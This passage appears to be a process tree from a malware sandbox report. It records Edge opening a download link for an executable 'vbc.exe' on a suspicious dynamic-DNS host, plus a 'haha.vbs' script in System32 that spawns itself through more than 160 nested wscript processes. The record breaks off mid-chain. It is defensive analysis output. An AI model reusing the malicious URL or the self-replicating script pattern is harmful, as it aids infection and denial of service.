        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3360 /prefetch:2
        5⤵
        
        PID:17728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x7c,0x104,0x7ff8829c46f8,0x7ff8829c4708,0x7ff8829c4718
        5⤵
        
        PID:300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16672548129433684542,4503015616216607651,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
        5⤵
        
        PID:5176
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,16672548129433684542,4503015616216607651,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5184
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      Modifies registry class
      PID:4268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.youtube.com/
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2164
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8829c46f8,0x7ff8829c4708,0x7ff8829c4718
        5⤵
        
        PID:3632
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,17942518626775070493,10442856819276979870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5960
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1948
    - - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4496
      - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        7⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4276
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        9⤵
        Checks computer location settings
        
        PID:1944
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        10⤵
        Checks computer location settings
        
        PID:5212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        11⤵
        Checks computer location settings
        
        PID:5756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        12⤵
        Checks computer location settings
        
        PID:5336
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        13⤵
        Checks computer location settings
        
        PID:3456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        14⤵
        Checks computer location settings
        
        PID:6372
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        15⤵
        Checks computer location settings
        
        PID:6484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        16⤵
        Checks computer location settings
        
        PID:6604
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        17⤵
        Checks computer location settings
        
        PID:6736
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        18⤵
        Checks computer location settings
        
        PID:7032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        19⤵
        Checks computer location settings
        
        PID:5608
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        20⤵
        Checks computer location settings
        
        PID:4120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        21⤵
        Checks computer location settings
        
        PID:6700
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        22⤵
        Checks computer location settings
        
        PID:7072
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        23⤵
        Checks computer location settings
        
        PID:6672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        24⤵
        Checks computer location settings
        
        PID:7056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        25⤵
        Checks computer location settings
        
        PID:6792
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        26⤵
        Checks computer location settings
        
        PID:6032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        27⤵
        Checks computer location settings
        
        PID:6452
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        28⤵
        
        PID:6968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        29⤵
        
        PID:6364
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        30⤵
        
        PID:7160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        31⤵
        
        PID:7208
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        32⤵
        
        PID:7260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        33⤵
        
        PID:7308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        34⤵
        
        PID:7364
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        35⤵
        
        PID:7412
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        36⤵
        
        PID:7512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        37⤵
        
        PID:7568
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        38⤵
        
        PID:7620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        39⤵
        
        PID:7672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        40⤵
        
        PID:7724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        41⤵
        
        PID:7776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        42⤵
        
        PID:7824
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        43⤵
        
        PID:7888
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        44⤵
        
        PID:7944
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        45⤵
        
        PID:8020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        46⤵
        
        PID:8072
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        47⤵
        
        PID:8120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        48⤵
        
        PID:5504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        49⤵
        
        PID:7504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        50⤵
        
        PID:2420
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        51⤵
        
        PID:3976
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        52⤵
        
        PID:7508
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        53⤵
        
        PID:5000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        54⤵
        
        PID:2716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        55⤵
        
        PID:3736
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        56⤵
        
        PID:4748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        57⤵
        
        PID:5844
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        58⤵
        
        PID:6076
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        59⤵
        
        PID:7476
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        60⤵
        
        PID:8228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        61⤵
        
        PID:8284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        62⤵
        
        PID:8332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        63⤵
        
        PID:8412
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        64⤵
        
        PID:8488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        65⤵
        
        PID:8556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        66⤵
        
        PID:8740
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        67⤵
        
        PID:8864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        68⤵
        
        PID:8920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        69⤵
        
        PID:9016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        70⤵
        
        PID:9088
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        71⤵
        
        PID:9180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        72⤵
        
        PID:8484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        73⤵
        
        PID:8616
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        74⤵
        
        PID:5432
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        75⤵
        
        PID:8792
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        76⤵
        
        PID:8960
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        77⤵
        
        PID:9176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        78⤵
        
        PID:8400
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        79⤵
        
        PID:9040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        80⤵
        
        PID:8796
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        81⤵
        
        PID:9236
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        82⤵
        
        PID:9284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        83⤵
        
        PID:9336
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        84⤵
        
        PID:9388
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        85⤵
        
        PID:9436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        86⤵
        
        PID:9484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        87⤵
        
        PID:9536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        88⤵
        
        PID:9600
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        89⤵
        
        PID:9652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        90⤵
        
        PID:9704
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        91⤵
        
        PID:9756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        92⤵
        
        PID:9808
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        93⤵
        
        PID:9856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        94⤵
        
        PID:9908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        95⤵
        
        PID:9960
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        96⤵
        
        PID:10008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        97⤵
        
        PID:10060
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        98⤵
        
        PID:10108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        99⤵
        
        PID:10196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        100⤵
        
        PID:9464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        101⤵
        
        PID:5572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        102⤵
        
        PID:9732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        103⤵
        
        PID:10168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        104⤵
        
        PID:9988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        105⤵
        
        PID:10292
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        106⤵
        
        PID:10344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        107⤵
        
        PID:10392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        108⤵
        
        PID:10440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        109⤵
        
        PID:10492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        110⤵
        
        PID:10544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        111⤵
        
        PID:10628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        112⤵
        
        PID:10688
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        113⤵
        
        PID:10788
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        114⤵
        
        PID:10844
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        115⤵
        
        PID:10940
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        116⤵
        
        PID:11020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        117⤵
        
        PID:11128
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        118⤵
        
        PID:11228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        119⤵
        
        PID:10716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        120⤵
        
        PID:10884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        121⤵
        
        PID:11064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        122⤵
        
        PID:11196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        123⤵
        
        PID:6120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        124⤵
        
        PID:10268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        125⤵
        
        PID:10664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        126⤵
        
        PID:1720
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        127⤵
        
        PID:1392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        128⤵
        
        PID:11316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        129⤵
        
        PID:11368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        130⤵
        
        PID:11416
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        131⤵
        
        PID:11472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        132⤵
        
        PID:11524
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        133⤵
        
        PID:11576
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        134⤵
        
        PID:11628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        135⤵
        
        PID:11680
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        136⤵
        
        PID:11732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        137⤵
        
        PID:11780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        138⤵
        
        PID:11832
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        139⤵
        
        PID:11880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        140⤵
        
        PID:11932
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        141⤵
        
        PID:11980
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        142⤵
        
        PID:12040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        143⤵
        
        PID:12092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        144⤵
        
        PID:12144
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        145⤵
        
        PID:12196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        146⤵
        
        PID:12260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        147⤵
        
        PID:11072
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        148⤵
        
        PID:11448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        149⤵
        
        PID:11760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        150⤵
        
        PID:5320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        151⤵
        
        PID:5224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        152⤵
        
        PID:6460
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        153⤵
        
        PID:12308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        154⤵
        
        PID:12448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        155⤵
        
        PID:12504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        156⤵
        
        PID:12556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        157⤵
        
        PID:12656
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        158⤵
        
        PID:12724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        159⤵
        
        PID:12820
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        160⤵
        
        PID:12884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        161⤵
        
        PID:12976
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        162⤵
        
        PID:13048
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        163⤵
        
        PID:13132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        164⤵
        
        PID:13200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        165⤵
        
        PID:13292
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        166⤵
        
        PID:12616
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        167⤵
        
        PID:12852
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        168⤵
        
        PID:13000
        
        C:\Windows\System32\wscript.exe
        
